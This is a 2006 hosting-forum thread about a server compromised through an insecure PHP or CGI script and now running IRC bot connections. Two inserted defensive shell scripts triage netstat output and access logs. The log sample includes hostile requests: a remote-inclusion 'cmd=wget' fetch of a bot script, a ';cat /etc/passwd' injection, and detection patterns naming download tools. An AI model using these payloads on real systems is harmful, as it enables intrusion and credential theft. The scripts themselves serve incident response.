#1  
Old 1st October 2006, 19:05
godsdog godsdog is offline
Member
 
Join Date: Apr 2006
Posts: 50
Thanks: 0
Thanked 0 Times in 0 Posts
Server Abuse

Hi. I'm positive that certain users are abusing the bandwidth and perhaps have compromised the server for other uses. I notice a huge amount of bandwidth being consumed by the server, and when I do a netstat I notice things like numerous ircd and tr-rsrb-p1 connections and a huge number of http connections from the same IP (or extremely similar ones on the same subnet).
It takes about 3 minutes to perform a netstat > list.txt command. Believe me, it's not a slow server...until now.

Where should I start? I'm a little taken that the firewall has no effect on these connections.
  #2  
Old 1st October 2006, 20:40
godsdog godsdog is offline
Member
 
Join Date: Apr 2006
Posts: 50
Thanks: 0
Thanked 0 Times in 0 Posts

Here is an example of what I see in my netstat
over 200 occurrences of
Code:
tcp        0      0 webserver.bcsolutions:60859 realmadrid.pl:ircd          CLOSE_WAIT  5784/-bash
and maybe 200 occurrences of
Code:
tcp        0    178 webserver.bcsolutions:44205 88.84.148.137:tr-rsrb-p1    LAST_ACK    -
These are only two of the absolute worst examples. This is normally a pretty quiet corner of the internet. I was having lots of fun killing the processes for a while, but they still always seem to come back.

Last edited by godsdog; 1st October 2006 at 22:14.
  #3  
Old 2nd October 2006, 03:10
godsdog godsdog is offline
Member
 
Join Date: Apr 2006
Posts: 50
Thanks: 0
Thanked 0 Times in 0 Posts

Well, I turned it off for a few hours and it seems that they've all gone away (who knows for how long). It's too bad these domains have to lose service for so long just to regain control. I still want to know how to prevent this from happening. I've got netstat outputs if it's any help.

>edit<

I am now performing commands like the following...is this effective? And if so, how do I block realmadrid.pl?
Code:
iptables -A INPUT -s  64.233.167.99 -j DROP

Last edited by godsdog; 2nd October 2006 at 05:53.
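The two netstat excerpts and the iptables rule above are the raw material for the following triage helper. It is an added example, not code from the thread: it reads `netstat -tnp` style output, counts connections per foreign host and port, flags endpoints that exceed a threshold or sit on an IRC port, and prints (without running) the iptables commands to block them. The sample lines, addresses, threshold and IRC port list are constructed assumptions; 192.0.2.10:6667 stands in for realmadrid.pl:ircd (6667 is ircd in /etc/services) and 198.51.100.7:1987 for the tr-rsrb-p1 host (1987). Two points the example builds in: in the posted lines the local side uses ephemeral ports (60859, 44205) and the remote side a service port, so these are connections the server itself opened, which is why an `INPUT -s` rule only strangles them by dropping the replies while an `OUTPUT -d` rule stops the bot from connecting at all; and iptables resolves a hostname once, when the rule is inserted, so block the numeric address that `netstat -n` shows rather than the name.

```shell
#!/bin/sh
# Added triage helper, not code from the thread. Reads `netstat -tnp` style
# output, aggregates by foreign host:port, flags likely bot traffic and emits
# (does not run) the iptables rules to block it. Threshold and IRC port list
# are assumptions; adjust them to the box.

# Constructed sample, not the poster's real netstat. Column layout follows
# netstat -tnp: proto recv-q send-q local foreign state pid/program.
SAMPLE='tcp        0      0 10.0.0.5:60859 192.0.2.10:6667      CLOSE_WAIT  5784/-bash
tcp        0      0 10.0.0.5:60860 192.0.2.10:6667      ESTABLISHED 5784/-bash
tcp        0      0 10.0.0.5:60861 192.0.2.10:6667      ESTABLISHED 5784/-bash
tcp        0    178 10.0.0.5:44205 198.51.100.7:1987    LAST_ACK    -
tcp        0    178 10.0.0.5:44206 198.51.100.7:1987    LAST_ACK    -
tcp        0      0 10.0.0.5:80    203.0.113.9:51234    ESTABLISHED 1201/apache2'

# summarise NETSTAT_TEXT: one line per foreign host:port,
# "count host port pids", busiest first.
summarise() {
    printf '%s\n' "$1" | awk '$1 ~ /^tcp/ {
        h = $5; p = $5
        sub(/:[^:]*$/, "", h)          # foreign host (strip trailing :port)
        sub(/^.*:/, "", p)             # foreign port
        k = h " " p
        n[k]++
        split($7, q, "/")              # "5784/-bash" -> PID 5784; "-" if unknown
        if (q[1] != "-" && index("," pids[k] ",", "," q[1] ",") == 0)
            pids[k] = (pids[k] == "" ? q[1] : pids[k] "," q[1])
    }
    END { for (k in n) print n[k], k, (pids[k] == "" ? "-" : pids[k]) }' | sort -rn
}

# suspicious NETSTAT_TEXT THRESHOLD: "host port" for every foreign endpoint
# with at least THRESHOLD connections or on a common IRC port (6660-6669, 7000).
suspicious() {
    summarise "$1" | awk -v t="$2" '
        $1 >= t || ($3 >= 6660 && $3 <= 6669) || $3 == 7000 { print $2, $3 }'
}

# block_rules NETSTAT_TEXT THRESHOLD: print iptables commands for review.
# The local ports are ephemeral and the foreign ports are service ports, so
# the server opened these connections itself: the OUTPUT rule is the one
# that stops the bot reconnecting; INPUT -s only drops the replies.
block_rules() {
    suspicious "$1" "$2" | awk '{
        print "iptables -A OUTPUT -d " $1 " -p tcp --dport " $2 " -j LOG --log-prefix \"bot-out: \""
        print "iptables -A OUTPUT -d " $1 " -j DROP"
        print "iptables -A INPUT  -s " $1 " -j DROP"
    }'
}

# Stand-alone run: the summary, then rules for anything over 20 connections
# or on an IRC port. Review the output before pasting it into a root shell.
summarise "$SAMPLE"
block_rules "$SAMPLE" 20
```

The PID column is worth reading too: the sample keeps the post's `5784/-bash`, and a process that calls itself a login shell while holding hundreds of IRC sockets is exactly what `ps -fp 5784` and `ls -l /proc/5784/exe` should be asked about before it is killed, since killing it alone did not stop it coming back.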
  #4  
Old 2nd October 2006, 07:47
godsdog godsdog is offline
Member
 
Join Date: Apr 2006
Posts: 50
Thanks: 0
Thanked 0 Times in 0 Posts

Well, I don't have to turn off the webserver in order to get on the net anymore so I'm guessing the iptables command has saved the day. I hope this thread comes in handy for anyone else battling wannabe hackers. This has made me think a little more seriously about passwords and other stuff.

Does anyone have any other suggestions for preventing and blocking or maybe even more on what and where to look for stuff regarding security? Thanks for anything else. It's been quite a day and I could have used a tip or two. Oh well, onward and upward. Cheers!
  #5  
Old 2nd October 2006, 12:32
till till is online now
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 35,502
Thanks: 813
Thanked 5,264 Times in 4,128 Posts

These are the typical symptoms of an insecure PHP or CGI script that allows remote command execution. Please check that all forums and CMS systems like phpBB and Mambo are patched and up to date on your server. Enable PHP safe mode in all sites where it is possible without breaking the installed PHP scripts.
__________________
Till Brehm
--
Get ISPConfig support and the ISPConfig 3 manual from ispconfig.org.
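Finding which script is being abused means reading the web server's access log, so here is an added example (not from the thread) of a first-pass triage in shell. It pulls the request path out of Apache combined-format lines, decodes the URL escapes attackers commonly use to hide metacharacters, and greps for the two patterns that turned unpatched PHP and CGI scripts into remote shells in this era: a parameter whose value is an external http/ftp URL (remote file inclusion, where the included URL is fetched and executed as PHP) and shell metacharacters or a download tool inside a parameter (command injection). The log lines, addresses and script names are constructed, and the pattern list is a starting point rather than a complete signature set.

```shell
#!/bin/sh
# Added access-log triage, not code from the thread. Extracts client and
# request path from Apache combined-format lines, decodes common escapes and
# greps for remote file inclusion and command injection attempts.

# Constructed sample lines, not the poster's logs. Addresses are from the
# documentation ranges; the script names are illustrative.
LOG='203.0.113.9 - - [01/Oct/2006:18:41:07 +0200] "GET /forum/index.php?page=http://198.51.100.7/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.9 - - [01/Oct/2006:18:41:09 +0200] "GET /forum/index.php?page=http://198.51.100.7/x.txt?&cmd=wget%20http://198.51.100.7/bot.pl HTTP/1.1" 200 733 "-" "Mozilla/4.0"
192.0.2.44 - - [01/Oct/2006:18:42:00 +0200] "GET /cms/index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Oct/2006:18:43:10 +0200] "GET /cgi-bin/form.cgi?name=%3Bcat%20/etc/passwd HTTP/1.1" 200 1200 "-" "curl/7.15"
198.51.100.20 - - [01/Oct/2006:18:44:00 +0200] "POST /forum/login.php HTTP/1.1" 302 0 "http://example.test/forum/" "Mozilla/5.0"'

# Decode the handful of escapes used to hide ; | / : and spaces.
# Deliberately minimal; a full decoder is overkill for a first pass.
urldecode() {
    sed 's/%3[Bb]/;/g; s/%7[Cc]/|/g; s/%2[Ff]/\//g; s/%3[Aa]/:/g; s/%20/ /g; s/+/ /g'
}

# hunt LOG_TEXT: "client path" for every request that looks like RFI or
# command injection. In combined format $1 is the client address and $7 the
# request path (the method is $6).
hunt() {
    printf '%s\n' "$1" | awk '{ print $1, $7 }' | urldecode |
        grep -E -i '=(https?|ftp)://|[;|`]|[?&=](wget|curl|fetch|lynx|perl|sh) '
}

# hunt_summary LOG_TEXT: hit count per client and script (query string
# stripped), so the exploited script and the attacking host stand out.
hunt_summary() {
    hunt "$1" | awk '{ split($2, u, "?"); c[$1 " " u[1]]++ }
                     END { for (k in c) print c[k], k }' | sort -rn
}

# Stand-alone run: on a real box replace $LOG with
#   hunt_summary "$(cat /var/log/apache2/access.log)"
hunt_summary "$LOG"
```

The script and the client address the summary points at are what to patch and what to block respectively; the request that carried `cmd=wget` also tells you where the dropped binary came from, which is the host the outbound connections should be checked against. On the safe mode advice, note that PHP's safe_mode was never a hard security boundary and was removed in PHP 5.4, so on any later version the patching step is the one that matters.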
  #6  
Old 2nd October 2006, 13:08
sjau sjau is offline
Local Meanie
 
Join Date: Apr 2006
Location: Switzerland
Posts: 1,138
Thanks: 4
Thanked 54 Times in 50 Posts

If the server truly has been compromised there's only one thing to do:

Total reinstall - as you can never be sure what's on the server... what was altered.... just have a go... if you notice unusual behaviour again then you might consider to do that.
  #7  
Old 3rd October 2006, 01:39
godsdog godsdog is offline
Member
 
Join Date: Apr 2006
Posts: 50
Thanks: 0
Thanked 0 Times in 0 Posts

Thanks for the advice on Safe Mode. I'll google up some literature on it. I've always seen it but never understood what it does.
Yesterday the server was using all bandwidth available and locking up our network for internet access, which made me think they were hosting files or something, but ever since I've banned their IP addresses it's back to normal. I'm definitely taking the log files seriously, and am ashamed to admit it, but things started getting a little wonky last week. I'll know better next time.
  #8  
Old 3rd October 2006, 07:26
sjau sjau is offline
Local Meanie
 
Join Date: Apr 2006
Location: Switzerland
Posts: 1,138
Thanks: 4
Thanked 54 Times in 50 Posts

Install chkrootkit and rkhunter (howtos in the howto section) and see if they find something.
All times are GMT +2. The time now is 14:12.